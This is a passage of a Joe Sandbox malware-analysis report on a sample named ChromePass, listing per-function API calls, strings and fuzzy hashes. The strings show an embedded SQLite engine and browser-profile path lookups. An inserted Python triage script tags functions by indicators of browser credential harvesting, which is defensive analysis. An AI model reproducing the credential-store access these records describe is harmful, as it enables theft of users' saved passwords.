                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                        • String ID:
                                        • API String ID: 1127616056-0
                                        • Opcode ID: e9e10e8cb14a7a64c4e0591c319302b2ca7c101559e5a295d32660d09392f7ff
                                        • Instruction ID: ab0931b25c1428f86abda644c0656466488a97ae6d1ae9063eea14835faf6012
                                        • Opcode Fuzzy Hash: e9e10e8cb14a7a64c4e0591c319302b2ca7c101559e5a295d32660d09392f7ff
                                        • Instruction Fuzzy Hash: 4A115272600129AFDF116F64EC46E9F7B7AEF04710F5001AAFF05B2161E6359A608F9D
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(00910048), ref: 0042B4D9
                                        • ??3@YAXPAX@Z.MSVCRT(00A55230), ref: 0042B4E9
                                        • ??3@YAXPAX@Z.MSVCRT(00A55A40), ref: 0042B4F9
                                        • ??3@YAXPAX@Z.MSVCRT(00A55638), ref: 0042B509
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 0ee1d2b0c1280dbc801e71a030d8bf5446004e25de82375410634bcceb9cf6b6
                                        • Instruction ID: 41a27a77a8f01ec54f2a8e4239e88027dc7e4243a076cdd9c04db82e030c68a2
                                        • Opcode Fuzzy Hash: 0ee1d2b0c1280dbc801e71a030d8bf5446004e25de82375410634bcceb9cf6b6
                                        • Instruction Fuzzy Hash: 1CE046B0300731979A20AF3ABC80B0733CCAB003583A4A42FF800E7792CF6CDA5080AC
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: 0
                                        • API String ID: 2221118986-4108050209
                                        • Opcode ID: afa524593e9d91b979767dc81998a397cf429524672ae6708b168924c117268a
                                        • Instruction ID: 1bda766ad6d0aac7714e86e791de8d56a862efed9bf5a6160e1af08104b98622
                                        • Opcode Fuzzy Hash: afa524593e9d91b979767dc81998a397cf429524672ae6708b168924c117268a
                                        • Instruction Fuzzy Hash: 4A825770E00218AFDF10DFA9D881BEEBBB5EF48304F54406AE915A7351D739AE81CB59
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00409689
                                        • SetCursor.USER32(?,?,?,0040985A,/deleteregkey,/savelangfile), ref: 004096E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Cursor_wcsicmp
                                        • String ID: /stext
                                        • API String ID: 58899023-3817206916
                                        • Opcode ID: 68701aeda6eea5332dba1a685ae2aa12d02637ce021e0d2fc59aca4fedb7f462
                                        • Instruction ID: 69e08b379d7359d5704747f81b5d423444406abbf3e9f2900bc54df1756a9f17
                                        • Opcode Fuzzy Hash: 68701aeda6eea5332dba1a685ae2aa12d02637ce021e0d2fc59aca4fedb7f462
                                        • Instruction Fuzzy Hash: 59216D752142009FD700EF66C88595A77E9EFC8324F14457FFC09DB692DA7AA8018B69
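Four of the function records in this section, taken together, are what a triager checks when confirming that a sample reaches into a browser credential store: the record whose wcscpy/wcscat loop builds a path from "AppData\Local" and the pre-Vista "Local Settings\Application Data"; the record that loads shell32.dll with LoadLibraryW, resolves SHGetSpecialFolderPathW by name through GetProcAddress and calls it with CSIDL 0x1C (CSIDL_LOCAL_APPDATA); the strlen-only record carrying SQLite parser error strings ("no such table: %s"); and the _wcsicmp record comparing the command line against "/stext". The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the "• API ID:" / "• String ID:" / "• Instruction Fuzzy Hash:" lines of such records and tags each function whose API tokens or string literals match one of those indicators. SAMPLE_RECORDS is copied from this report's records for process 15 (image base 0x400000); the tag names and the matching rules are the example's own assumptions, not Joe Sandbox output.

```python
"""Triage helper for the per-function 'Similarity' records of a Joe Sandbox report.

Added example, not part of the report or of the analysed sample.  It parses the
'• API ID:' / '• String ID:' / '• Instruction Fuzzy Hash:' lines of each record
and tags the functions whose API tokens and string literals point at browser
profile discovery, dynamic API resolution, an embedded SQLite engine or a
text-export command-line switch.  SAMPLE_RECORDS is copied from four records of
this report (process 15, image base 0x400000); the tag names and rules are
this example's own assumptions, not Joe Sandbox output."""
import re
from dataclasses import dataclass, field

SAMPLE_RECORDS = r"""
• API ID: wcslen$memsetwcscatwcscpy
• String ID: AppData\Local$Local Settings\Application Data
• Instruction Fuzzy Hash: 1321877294411DABDB10EB50DE8AACDB7A9AF10319F5000BBE908F31C1EB785F448A59
• API ID: strlen
• String ID: %s.%s$no such table: %s$no tables specified$too many columns in result set$>B
• Instruction Fuzzy Hash: A0E16071A00229EFDF15DF95E4806AEB7B1BF48315F64809BE805AB351D73CAE81CB58
• API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
• String ID: @%@
• Instruction Fuzzy Hash: E601B1B2500218AEEB21B755EC4AEAF737DDF84314F20047BF909B1081EA785E519A6A
• API ID: Cursor_wcsicmp
• String ID: /stext
• Instruction Fuzzy Hash: 59216D752142009FD700EF66C88595A77E9EFC8324F14457FFC09DB692DA7AA8018B69
"""

_FIELD = re.compile(r"^\s*•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*?)\s*$")


@dataclass
class FunctionRecord:
    api_id: str
    string_id: str
    fuzzy_hash: str
    tags: list = field(default_factory=list)

    @property
    def strings(self):
        # Joe Sandbox joins the string literals a function references with '$'.
        return [s for s in self.string_id.split("$") if s]

    @property
    def api_tokens(self):
        # The API ID concatenates CamelCase fragments of the Win32 names
        # (SHGetSpecialFolderPath -> Special, Folder, Path).  Lower-case CRT
        # names trail the list and cannot be split without a dictionary, so
        # the rules below only rely on the CamelCase fragments.
        return set(re.findall(r"[A-Z][a-z0-9]+", self.api_id))


def parse_records(text):
    """Return one FunctionRecord per API ID / String ID / Fuzzy Hash triple."""
    records, current = [], {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if not m:
            continue
        current[m.group(1)] = m.group(2)
        if m.group(1) == "Instruction Fuzzy Hash":   # last field of a record
            records.append(FunctionRecord(current.get("API ID", ""),
                                          current.get("String ID", ""),
                                          current["Instruction Fuzzy Hash"]))
            current = {}
    return records


# (tag, CamelCase API tokens that must all be present, substrings that must
#  appear in at least one referenced string literal); either side suffices.
RULES = [
    ("browser-profile-path", set(), [r"AppData\Local", r"Local Settings\Application Data"]),
    ("special-folder-lookup", {"Special", "Folder", "Path"}, []),
    ("dynamic-api-resolution", {"Library", "Load", "Proc", "Address"}, []),
    ("sqlite-engine", set(), ["no such table", "sqlite_"]),
    ("text-export-switch", set(), ["/stext"]),
]


def tag_record(rec):
    """Attach every rule tag whose API tokens or string needles match."""
    rec.tags = []
    for tag, tokens, needles in RULES:
        token_hit = bool(tokens) and tokens <= rec.api_tokens
        string_hit = any(n in s for s in rec.strings for n in needles)
        if token_hit or string_hit:
            rec.tags.append(tag)
    return rec.tags


def triage(text):
    """Parse a report excerpt and return only the records that got a tag."""
    records = parse_records(text)
    return [rec for rec in records if tag_record(rec)]


if __name__ == "__main__":
    for rec in triage(SAMPLE_RECORDS):
        print(rec.fuzzy_hash[:16], ", ".join(rec.tags), "|", " / ".join(rec.strings))
```

Run it against a saved copy of the whole report text instead of SAMPLE_RECORDS to tag every function; a module whose records carry both browser-profile-path and sqlite-engine tags, as this one does, matches the browser credential-harvesting behaviour listed in the signature summary, and the Instruction Fuzzy Hash of each tagged function is the value to pivot on when hunting for other samples that embed the same routine.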
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00405A0B,00401F52,?,?), ref: 00405995
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00405A0B,00401F52,?,?), ref: 004059B3
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059D1
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,00405A0B,00401F52,?,?), ref: 004059EF
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: 0e90696c28a97b768179aa07cb3710ff6ae6b02484a7f1fe566f4b362b124399
                                        • Instruction ID: f1e19045f2d6afe60d2eb8405ad52210b2a3be0a5fa56beb63964390426f5968
                                        • Opcode Fuzzy Hash: 0e90696c28a97b768179aa07cb3710ff6ae6b02484a7f1fe566f4b362b124399
                                        • Instruction Fuzzy Hash: FD011EB13417015FE758DB38ED47B6A3690A788358F51713EA907CD1F8EE7448448B48
                                        APIs
                                        Strings
                                        • a GROUP BY clause is required before HAVING, xrefs: 00423FA2
                                        • aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042405C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                        • API String ID: 2221118986-906175814
                                        • Opcode ID: 42f1c003817d01f76a7b329de239f2fa39b0c8ee80e8011f9a6698d2256356b1
                                        • Instruction ID: d6fdc162a0bdf933e5a7984ebb5e25948f3a11b5483ce83de42664a05e09de92
                                        • Opcode Fuzzy Hash: 42f1c003817d01f76a7b329de239f2fa39b0c8ee80e8011f9a6698d2256356b1
                                        • Instruction Fuzzy Hash: 7F51AF71A083119FC720DE25E981A5BB7F4AF88319F95081FF88587342D73CEA45876A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: e$statement too long
                                        • API String ID: 2221118986-303685292
                                        • Opcode ID: 794dd4ba030559d7e74f9912c9dd4bfa6078ac8d3ca22890e26558b5c9222f75
                                        • Instruction ID: b19cad5e121c7a63733cb21393a521153f1a01f8c8e8d0239ac9277f8eaca46a
                                        • Opcode Fuzzy Hash: 794dd4ba030559d7e74f9912c9dd4bfa6078ac8d3ca22890e26558b5c9222f75
                                        • Instruction Fuzzy Hash: 01518671A00228EFDF21DF54DC91BDE77B4AF15304F5000ABE90867251D7786E85DB99
                                        APIs
                                        • atoi.MSVCRT(00000000,sqlite_master,?,?,?,?,00421871,?,00000003,?,00000000,00000000,?), ref: 0042179C
                                        • atoi.MSVCRT(00000000,sqlite_master,?,?,?,?,00421871,?,00000003,?,00000000,00000000,?), ref: 0042181E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: atoi
                                        • String ID: sqlite_master
                                        • API String ID: 657269090-3163232059
                                        • Opcode ID: f5aa0c6a605ab96f8dc057e4af25762ce8ae3f246fd78d67583255fa01c05cdf
                                        • Instruction ID: 30ef85cfd03b586ed0434af1063668c4d226d1f32ee0794736749da60052fe85
                                        • Opcode Fuzzy Hash: f5aa0c6a605ab96f8dc057e4af25762ce8ae3f246fd78d67583255fa01c05cdf
                                        • Instruction Fuzzy Hash: C0313A32704251AFDB259F22E881B26B7D1EFA4314F64402FE8058B271DB39E841C7D9
                                        APIs
                                        • strlen.MSVCRT ref: 0042A7E2
                                          • Part of subcall function 0041DF67: memcpy.MSVCRT(0000001C,0042AD04,00000000), ref: 0041E032
                                        Strings
                                        • bad parameters, xrefs: 0042A83C
                                        • Unable to delete/modify user-function due to active statements, xrefs: 0042A81F
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpystrlen
                                        • String ID: Unable to delete/modify user-function due to active statements$bad parameters
                                        • API String ID: 3412268980-1262664748
                                        • Opcode ID: 4750ac4f64df20fe14f20581181399b441305fd699aa432eca9752a195267de7
                                        • Instruction ID: e2583e71bc0324cef428d3d908088a87ccf9ef41c9de883cf6763ad4d955ad6f
                                        • Opcode Fuzzy Hash: 4750ac4f64df20fe14f20581181399b441305fd699aa432eca9752a195267de7
                                        • Instruction Fuzzy Hash: 8A21B470700251EFDF24AF20A841BAB77A1AB04744F50402FFD058A282E779CDE2C69B
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: malloc$CriticalLeaveSection
                                        • String ID:
                                        • API String ID: 3071071276-0
                                        • Opcode ID: ddd45cabfc29e04858f3b4a54179dc07d1ab7b7d7c2a11ea6175609c0dbd8c76
                                        • Instruction ID: 58a28df5d68d4c32b227e5c0aefb609fd1eaf3578d0e6b8a1ed8ab7e9c64f7f4
                                        • Opcode Fuzzy Hash: ddd45cabfc29e04858f3b4a54179dc07d1ab7b7d7c2a11ea6175609c0dbd8c76
                                        • Instruction Fuzzy Hash: 7F117CB3A00A108BC724DB14ECE185A73E9FB48BD4315653FE824E73A1C7B898418BDD
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AttributesFilefree
                                        • String ID:
                                        • API String ID: 1936811914-0
                                        • Opcode ID: 1b55a115b6651d074f8abd2a18ce25ff18cbd72e89a4077e0e2222b355676b88
                                        • Instruction ID: f03d147386478639c031dd4aab21c4ee59dd6ac5a3055defa47c866c469ca497
                                        • Opcode Fuzzy Hash: 1b55a115b6651d074f8abd2a18ce25ff18cbd72e89a4077e0e2222b355676b88
                                        • Instruction Fuzzy Hash: 3CF0C836D00515FBCB205FFDDD056AF7A649B40328B24013BFC16F62C0EA38AD069268
                                        APIs
                                        • malloc.MSVCRT ref: 00404B03
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004027D0,00000002,?,?,?,00401DD0,?), ref: 00404B1B
                                        • free.MSVCRT ref: 00404B24
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: 4ec0a3633af83db2ef3e3f5a0b741c4b76ce56ff2941dd1a7c9ab502857e5d05
                                        • Instruction ID: 7d81a51da6d272be3227bb4bca0c31c89fe0157254a78abba71958b2e05c0512
                                        • Opcode Fuzzy Hash: 4ec0a3633af83db2ef3e3f5a0b741c4b76ce56ff2941dd1a7c9ab502857e5d05
                                        • Instruction Fuzzy Hash: 48F089B37052229FC7189A75B94185BB3ADAF84325751442FF904D7281D738EC50C7A9
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040E7E4
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040E836
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: a96fc410173db621db0d4444a8ae677d8faef3f4941332292e50b7516178888b
                                        • Instruction ID: f055bcdf697316c0d5fcd3c93f3fcec89edffe739f3a922271ec41f17ae25e25
                                        • Opcode Fuzzy Hash: a96fc410173db621db0d4444a8ae677d8faef3f4941332292e50b7516178888b
                                        • Instruction Fuzzy Hash: 9E617175B00606EFDB14DFB6C880AAEB7B4FF48314F10456AE914A7381D738AD64DB94
                                        APIs
                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,00000000), ref: 00410E60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID: SQLite format 3
                                        • API String ID: 1475443563-759114288
                                        • Opcode ID: d35fd90adc4eca7626042c513d7ca5ff2d4b7392b5192c198e11bac51d5f790c
                                        • Instruction ID: 7a948cabf6688ffad0fb851a8221fe331fddf99336a370c70b7dc6847946aa22
                                        • Opcode Fuzzy Hash: d35fd90adc4eca7626042c513d7ca5ff2d4b7392b5192c198e11bac51d5f790c
                                        • Instruction Fuzzy Hash: F541C2719047459EC720CFA6C5417EABBF0AF18304F140A5FD491D7642E3B8EAC5DBA5
                                        APIs
                                          • Part of subcall function 00406B39: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406B5B
                                          • Part of subcall function 00406B39: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00406BF0
                                          • Part of subcall function 00404857: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00407BBD,?), ref: 00404869
                                        • CloseHandle.KERNELBASE(?), ref: 00407E1E
                                        • SetCursor.USER32 ref: 00407E2A
                                          • Part of subcall function 0040523F: WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,004022C7,?,?,00000000,?), ref: 00405256
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateCursorHandleWrite
                                        • String ID:
                                        • API String ID: 2042149353-0
                                        • Opcode ID: 3a6ace903472f4d56c57e321bc51bb5f79d762c189b85c980400dd9ebe6d50e2
                                        • Instruction ID: b242dfafaea419cf09a864ada9b1743c0dadae4235e2c8f1285360d2b2f17e01
                                        • Opcode Fuzzy Hash: 3a6ace903472f4d56c57e321bc51bb5f79d762c189b85c980400dd9ebe6d50e2
                                        • Instruction Fuzzy Hash: 05319671B04100AFCB256F69CC89E6E7BA5AF84314F11447FF446A72D1CB39AD80CA99
                                        APIs
                                        • memset.MSVCRT ref: 0040F69D
                                        • memcmp.MSVCRT(?,00000000,00000010,?,00000000,00000000,?,00000000,004118FC,00000000,00000048,00000000,00000000,00411A7F,00000048,00000000), ref: 0040F6B2
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcmpmemset
                                        • String ID:
                                        • API String ID: 1065087418-0
                                        • Opcode ID: d5a313fa8d306e788d3c276cadfebc3fbe89a6dba21542b7c5779996bee17c5d
                                        • Instruction ID: 45caf7c4415f3f6eed915e372f33cd5a6d816b95c38a517210f0624132c76d84
                                        • Opcode Fuzzy Hash: d5a313fa8d306e788d3c276cadfebc3fbe89a6dba21542b7c5779996bee17c5d
                                        • Instruction Fuzzy Hash: 7261C5B1900646BBDB30DF64C88066AB7B4BB10304F24497FE504F7AD2D739AD59CB9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                         • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 5a47a92697ceca4bda858669ce9da63cc47876be752c494a90490a2f72832735
                                        • Instruction ID: 3bf3397b8cd2a7021ef727dcbdd47b90010fc7a11b5e82b2e04aa4fde8c7ed5f
